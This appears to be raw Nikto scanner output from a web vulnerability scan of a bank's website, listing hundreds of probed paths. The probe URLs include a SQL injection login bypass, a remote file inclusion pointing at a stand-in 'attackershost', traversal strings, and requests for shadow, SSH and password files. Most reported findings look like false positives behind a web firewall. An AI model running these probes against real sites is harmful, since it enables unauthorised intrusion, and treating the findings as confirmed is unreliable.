- Nikto
---------------------------------------------------------------------------
+ Target IP: 45.60.241.223
+ Target Hostname: www.1firstbank.com
+ Target Port: 80
+ Start Time: 2024-11-29 17:39:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: Cookie incap_ses_269_2678378 created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-served-by header: cache-lga21920-LGA.
+ /: Incapsula WAF is in use. See: https://www.sumasoft.com/incapsula-cloud-based-web-application-firewall-waf/
+ /: Fastly CDN was identified by the x-timer header. See: https://www.fastly.com/
+ /: Uncommon header 'x-iinfo' found, with contents: 9-9251557-9251558 NNNY CT(1 -1 0) RT(1732919940515 0) q(0 0 0 -1) r(0 0) U24.
+ /: Uncommon header 'x-served-by' found, with contents: cache-lga21920-LGA.
+ Root page / redirects to: https://www.1firstbank.com/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /subir/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /subir/: This might be interesting.
+ /sun/: This might be interesting.
+ /super_stats/access_logs: Web logs are exposed..
+ /super_stats/error_logs: Web logs are exposed.
+ /support/: This might be interesting.
+ /swf: This might be interesting: Flash files?.
+ /sys/: This might be interesting.
+ /system/: This might be interesting.
+ /tar/: This might be interesting.
+ /tarjetas/: This might be interesting.
+ /temp/: This might be interesting.
+ /template/: This might be interesting: could have sensitive files or system information.
+ /temporal/: This might be interesting.
+ /test.htm: This might be interesting.
+ /test.html: This might be interesting.
+ /test.txt: This might be interesting. + /test/: This might be interesting. + /testing/: This might be interesting. + /tests/: This might be interesting. + /tmp/: This might be interesting. + /tools/: This might be interesting. + /tpv/: This might be interesting. + /trabajo/: This might be interesting. + /trafficlog/: This might be interesting. + /transito/: This might be interesting. + /tree/: This might be interesting. + /trees/: This might be interesting. + /updates/: This might be interesting. + /user/: This might be interesting. + /users/: This might be interesting. + /users/scripts/submit.cgi: This might be interesting. + /ustats/: This might be interesting. + /usuario/: This might be interesting. + /usuarios/: This might be interesting. + /vfs/: This might be interesting. + /w3perl/admin: This might be interesting. + /warez/: This might be interesting. + /web/: This might be interesting. + /web800fo/: This might be interesting. + /webaccess.htm: This might be interesting. + /webaccess/access-options.txt: This might be interesting. + /webadmin/: This might be interesting: probably HostingController, www.hostingcontroller.com. + /webboard/: This might be interesting. + /webcart-lite/: This might be interesting. + /webcart/: This might be interesting. + /webdata/: This might be interesting. + /weblog/: This might be interesting. + /weblogs/: This might be interesting. + /webmaster_logs/: This might be interesting. + /WebShop/: This might be interesting. + /WebShop/logs/cc.txt: Seen in carding forums. See: https://packetstormsecurity.com/files/32406/xmas.txt.html + /WebShop/templates/cc.txt: Seen in carding forums. See: https://packetstormsecurity.com/files/32406/xmas.txt.html + /website/: This might be interesting. + /webstats/: This might be interesting. + /WebTrend/: This might be interesting. + /Web_store/: This might be interesting. + /windows/: This might be interesting. + /word/: This might be interesting. + /work/: This might be interesting. 
+ /wstats/: This might be interesting. + /wusage/: This might be interesting. + /www-sql/: This might be interesting. + /www/: This might be interesting. + /wwwboard/wwwboard.cgi: This might be interesting. + /wwwboard/wwwboard.pl: This might be interesting. + /wwwjoin/: This might be interesting. + /wwwlog/: This might be interesting. + /wwwstats.html: This might be interesting. + /wwwstats/: This might be interesting. + /wwwthreads/3tvars.pm: This might be interesting. + /wwwthreads/w3tvars.pm: This might be interesting. + /zipfiles/: This might be interesting. + /adsamples/config/site.csc: Contains SQL username/password. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1520 + /advworks/equipment/catalog_type.asp: Seen in carding forums. See: https://packetstormsecurity.com/files/32406/xmas.txt.html + /carbo.dll: This might be interesting. + /clocktower/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /market/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /mspress30/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /sam: This might be interesting. + /sam.bin: This might be interesting. + /sam._: This might be interesting. + /samples/search/queryhit.htm: This might be interesting. + /scripts/counter.exe: This might be interesting. + /scripts/cphost.dll: cphost.dll may have a DoS and a traversal issue. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1769 + /scripts/fpadmcgi.exe: This might be interesting. + /scripts/postinfo.asp: This might be interesting. + /scripts/samples/ctguestb.idc: This might be interesting. + /scripts/samples/search/webhits.exe: This might be interesting. + /site/iissamples/: This might be interesting. 
+ /vc30/: Microsoft Site Server sample files may have SQL injection. See: https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt + /_mem_bin/: This might be interesting: user login. + /_mem_bin/FormsLogin.asp: This might be interesting: user login. + /perl/files.pl: This might be interesting. + /perl5/files.pl: This might be interesting. + /scripts/convert.bas: This might be interesting. + /owa_util%2esignature: This might be interesting. + /cgi-dos/args.bat: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /custdata/: This may be COWS (CGI Online Worldweb Shopping), and may leak customer data. + /hostingcontroller/: This might be interesting: probably HostingController, www.hostingcontroller.com. + /databases/: Databases directy found. + /img-sys/: Default image directory should not allow directory listing. + /java-sys/: Default Java directory should not allow directory listing. + /javadoc/: Documentation...?. + /log/: Ahh...log information...fun!. + /manager/: May be a web server or site manager. + /manual/: Web server manual found. + /exchange/: This might be interesting: Outlook/Exchange OWA. + /finance.xls: Finance spreadsheet?. + /finances.xls: Finance spreadsheet?. + /abonnement.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /acartpath/signin.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /add_acl: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/auth.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configscreen.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configsite.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cfg/configsql.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /admin/cfg/configtache.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/cms/htmltags.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/credit_card_info.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/exec.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/modules/cache.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/objects.inc.php4: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/script.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/settings.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/templates/header.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin/upload.php: This might be interesting: has been seen in web logs from an unknown scanner. + /admin_t/include/aff_liste_langue.php: This might be interesting: has been seen in web logs from an unknown scanner. + /adv/gm001-mc/: This might be interesting: has been seen in web logs from an unknown scanner. + /aff_news.php: This might be interesting: has been seen in web logs from an unknown scanner. + /approval/ts_app.htm: This might be interesting: has been seen in web logs from an unknown scanner. + /archive.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /archive_forum.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /ashnews.php: This might be interesting: has been seen in web logs from an unknown scanner. + /auth.inc.php: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /b2-tools/gm-2-b2.php: This might be interesting: has been seen in web logs from an unknown scanner. + /bandwidth/index.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /basilix.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting: has been seen in web logs from an unknown scanner. + /bin/common/user_update_passwd.pl: This might be interesting: has been seen in web logs from an unknown scanner. + /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /board/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /board/philboard_admin.asp+: This might be interesting: has been seen in web logs from an unknown scanner. + /bugtest+/+: This might be interesting: has been seen in web logs from an unknown scanner. + /caupo/admin/admin_workspace.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ccbill/whereami.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /chat_dir/register.php: This might be interesting: has been seen in web logs from an unknown scanner. + /checkout_payment.php: This might be interesting: has been seen in web logs from an unknown scanner. + /communique.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /community/forumdisplay.php: This might be interesting: has been seen in web logs from an unknown scanner. + /community/index.php?analized=anything: This might be interesting: has been seen in web logs from an unknown scanner. + /community/member.php: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /compte.php: This might be interesting: has been seen in web logs from an unknown scanner. + /config/html/cnf_gi.htm: This might be interesting: has been seen in web logs from an unknown scanner. + /convert-date.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cp/rac/nsManager.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /csPassword.cgi?command=remove%20: This might be interesting: has been seen in web logs from an unknown scanner. + /cutenews/comments.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cutenews/search.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cutenews/shownews.php: This might be interesting: has been seen in web logs from an unknown scanner. + /Data/settings.xml+: This might be interesting: has been seen in web logs from an unknown scanner. + /database/metacart.mdb+: This might be interesting: has been seen in web logs from an unknown scanner. + /db.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dbabble: This might be interesting: has been seen in web logs from an unknown scanner. + /dcp/advertiser.php: This might be interesting: has been seen in web logs from an unknown scanner. + /defines.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dltclnt.php: This might be interesting: has been seen in web logs from an unknown scanner. + /doc/admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /docs/NED: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/files/index_table.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/projects/addedit.php: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /dotproject/modules/projects/view.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/projects/vw_files.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/tasks/addedit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /dotproject/modules/tasks/viewgantt.php: This might be interesting: has been seen in web logs from an unknown scanner. + /do_map: This might be interesting: has been seen in web logs from an unknown scanner. + /do_subscribe: This might be interesting: has been seen in web logs from an unknown scanner. + /email.php: This might be interesting: has been seen in web logs from an unknown scanner. + /emml_email_func.php: This might be interesting: has been seen in web logs from an unknown scanner. + /emumail.cgi?type=.%00: This might be interesting: has been seen in web logs from an unknown scanner. + /entete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /enteteacceuil.php: This might be interesting: has been seen in web logs from an unknown scanner. + /etc/shadow+: This might be interesting: has been seen in web logs from an unknown scanner. + /eventcal2.php.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ez2000/ezadmin.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /ez2000/ezboard.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /ez2000/ezman.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /faqman/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemanager/index.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/brokenfile.php: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /filemgmt/singlefile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/viewcat.php: This might be interesting: has been seen in web logs from an unknown scanner. + /filemgmt/visit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /foro/YaBB.pl: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/mainfile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/member.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/newreply.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/newthread.php: This might be interesting: has been seen in web logs from an unknown scanner. + /forum/viewtopic.php: phpBB found. + /forum_arc.asp?n=268: This might be interesting: has been seen in web logs from an unknown scanner. + /forum_professionnel.asp?n=100: This might be interesting: has been seen in web logs from an unknown scanner. + /functions.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /globals.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /globals.pl: This might be interesting: has been seen in web logs from an unknown scanner. + /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi. See: https://seclists.org/fulldisclosure/2004/Jun/49 + /homebet/homebet.dll?form=menu&option=menu-signin: This might be interesting: has been seen in web logs from an unknown scanner. + /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /include/customize.php: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /include/help.php: This might be interesting: has been seen in web logs from an unknown scanner. + /includes/footer.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /includes/header.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/contact/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/faq/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/gen/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /infos/services/index.asp: This might be interesting: has been seen in web logs from an unknown scanner. + /instaboard/index.cfm: This might be interesting: has been seen in web logs from an unknown scanner. + /intranet/browse.php: This might be interesting: has been seen in web logs from an unknown scanner. + /invitefriends.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /ipchat.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ixmail_netattach.php: This might be interesting: has been seen in web logs from an unknown scanner. + /jsptest.jsp+: This might be interesting: has been seen in web logs from an unknown scanner. + /kernel/class/delete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /kernel/classes/ezrole.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting: has been seen in web logs from an unknown scanner. + /livredor/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /login.php3?reason=chpass2%20: This might be interesting: has been seen in web logs from an unknown scanner. + /mail/include.html: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /mail/settings.html: This might be interesting: has been seen in web logs from an unknown scanner. + /mambo/banners.php: This might be interesting: has been seen in web logs from an unknown scanner. + /manage/login.asp+: This might be interesting: has been seen in web logs from an unknown scanner. + /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting: has been seen in web logs from an unknown scanner. + /members/ID.pm: This might be interesting: has been seen in web logs from an unknown scanner. + /members/ID.xbb: This might be interesting: has been seen in web logs from an unknown scanner. + /mod.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modif/delete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modif/ident.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Downloads/voteinclude.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Forums/attachment.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Search/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/in.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/out.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/quit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/WebChat/users.php: This might be interesting: has been seen in web logs from an unknown scanner. + /modules/Your_Account/navbar.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /moregroupware/modules/webmail2/inc/: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /netget?sid=Safety&msg=2002&file=Safety: This might be interesting: has been seen in web logs from an unknown scanner. + /newtopic.php: This might be interesting: has been seen in web logs from an unknown scanner. + /nphp/nphpd.php: This might be interesting: has been seen in web logs from an unknown scanner. + /OpenTopic: This might be interesting: has been seen in web logs from an unknown scanner. + /options.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /oscommerce/default.php: This might be interesting: has been seen in web logs from an unknown scanner. + /parse_xml.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /php/gaestebuch/admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /php/php4ts.dll: This might be interesting: has been seen in web logs from an unknown scanner. + /pks/lookup: This might be interesting: has been seen in web logs from an unknown scanner. + /pm/lib.inc.php: This might be interesting: has been seen in web logs from an unknown scanner. + /poppassd.php3+: This might be interesting: has been seen in web logs from an unknown scanner. + /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /product_info.php: This might be interesting: has been seen in web logs from an unknown scanner. + /prometheus-all/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /protected/: This might be interesting: has been seen in web logs from an unknown scanner. + /protected/secret.html+: This might be interesting: has been seen in web logs from an unknown scanner. + /protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting: has been seen in web logs from an unknown scanner. + /protection.php: This might be interesting: has been seen in web logs from an unknown scanner. + /pt_config.inc: This might be interesting: has been seen in web logs from an unknown scanner. + /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting: has been seen in web logs from an unknown scanner. + /pvote/del.php?pollorder=1%20: This might be interesting: has been seen in web logs from an unknown scanner. + /quikmail/nph-emumail.cgi?type=../%00: This might be interesting: has been seen in web logs from an unknown scanner. + /room/save_item.php: This might be interesting: has been seen in web logs from an unknown scanner. + /screen.php: This might be interesting: has been seen in web logs from an unknown scanner. + /scripts/tradecli.dll: This might be interesting: has been seen in web logs from an unknown scanner. + /security/web_access.html: This might be interesting: has been seen in web logs from an unknown scanner. + /sendphoto.php: This might be interesting: has been seen in web logs from an unknown scanner. + /servers/link.cgi: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /shop/php_files/site.config.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /shop/search.php: This might be interesting: has been seen in web logs from an unknown scanner. + /shop/show.php: This might be interesting: has been seen in web logs from an unknown scanner. + /Site/biztalkhttpreceive.dll: This might be interesting: has been seen in web logs from an unknown scanner. + /site_searcher.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /spelling.php3+: This might be interesting: has been seen in web logs from an unknown scanner. + /staticpages/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /status.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /supporter/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /supporter/tupdate.php: This might be interesting: has been seen in web logs from an unknown scanner. + /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting: has been seen in web logs from an unknown scanner. + /syslog.htm?%20: This might be interesting: has been seen in web logs from an unknown scanner. + /technote/print.cgi: This might be interesting: has been seen in web logs from an unknown scanner. + /texis/websearch/phine: This might be interesting: has been seen in web logs from an unknown scanner. + /tinymsg.php: This might be interesting: has been seen in web logs from an unknown scanner. + /topic/entete.php: This might be interesting: has been seen in web logs from an unknown scanner. + /topsitesdir/edit.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ttforum/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /tutos/file/file_new.php: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /tutos/file/file_select.php: This might be interesting: has been seen in web logs from an unknown scanner. + /typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /cms/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /site/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /typo/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /typo3/typo3/dev/translations.php: This might be interesting: has been seen in web logs from an unknown scanner. + /uifc/MultFileUploadHandler.php+: This might be interesting: has been seen in web logs from an unknown scanner. + /url.jsp: This might be interesting: has been seen in web logs from an unknown scanner. + /useraction.php3: This might be interesting: has been seen in web logs from an unknown scanner. + /utils/sprc.asp+: This might be interesting: has been seen in web logs from an unknown scanner. + /vars.inc+: This might be interesting: has been seen in web logs from an unknown scanner. + /VBZooM/add-subject.php: This might be interesting: has been seen in web logs from an unknown scanner. + /wbboard/profile.php: This might be interesting: has been seen in web logs from an unknown scanner. + /wbboard/reply.php: This might be interesting: has been seen in web logs from an unknown scanner. + /webcalendar/login.php: This might be interesting: has been seen in web logs from an unknown scanner. + /webcalendar/view_m.php: This might be interesting: has been seen in web logs from an unknown scanner. + /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting: has been seen in web logs from an unknown scanner. + /web_app/WEB-INF/webapp.properties: This might be interesting: has been seen in web logs from an unknown scanner. 
+ /XMBforum/buddy.php: This might be interesting: has been seen in web logs from an unknown scanner. + /XMBforum/member.php: This might be interesting: has been seen in web logs from an unknown scanner. + /x_stat_admin.php: This might be interesting: has been seen in web logs from an unknown scanner. + /yabbse/Reminder.php: This might be interesting: has been seen in web logs from an unknown scanner. + /yabbse/Sources/Packages.php: This might be interesting: has been seen in web logs from an unknown scanner. + /zentrack/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + /_head.php: This might be interesting: has been seen in web logs from an unknown scanner. + /ows-bin/oaskill.exe?abcde.exe: This might be interesting: has been seen in web logs from an unknown scanner. + /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting: has been seen in web logs from an unknown scanner. + /database/: Database directory found. + /.wwwacl: Contains authorization information. + /.www_acl: Contains authorization information. + /.access: Contains authorization information. + /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes. + /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to. + /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web. + /.htaccess: Contains configuration and/or authorization information. + /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites. + /.passwd: Contains authorization information. + /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more. 
+ /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol. + /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more. + /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more. + /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web. + /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /jservdocs/: Default Apache JServ docs should be removed. See: CWE-552 + /tomcat-docs/index.html: Default Apache Tomcat documentation found. See: CWE-552 + /akopia/: Akopia is installed. See: CWE-552 + /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field. See: CWE-552 + /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field. See: CWE-552 + /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field. See: CWE-552 + /php/index.php: Monkey Http Daemon default PHP file found. See: CWE-552 + /servlet/Counter: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers. 
See: CWE-552 + /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers. See: CWE-552 + /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers. See: CWE-552 + /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers. See: CWE-552 + /admcgi/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /admisapi/fpadmin.htm: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /bin/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/fpadmin.htm: Default FrontPage CGI found. 
See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpcount.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /scripts/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/orders.htm: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/orders.txt: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/register.htm: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/register.txt: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/registrations.txt: Default FrontPage file found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_private/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/: FrontPage directory found. 
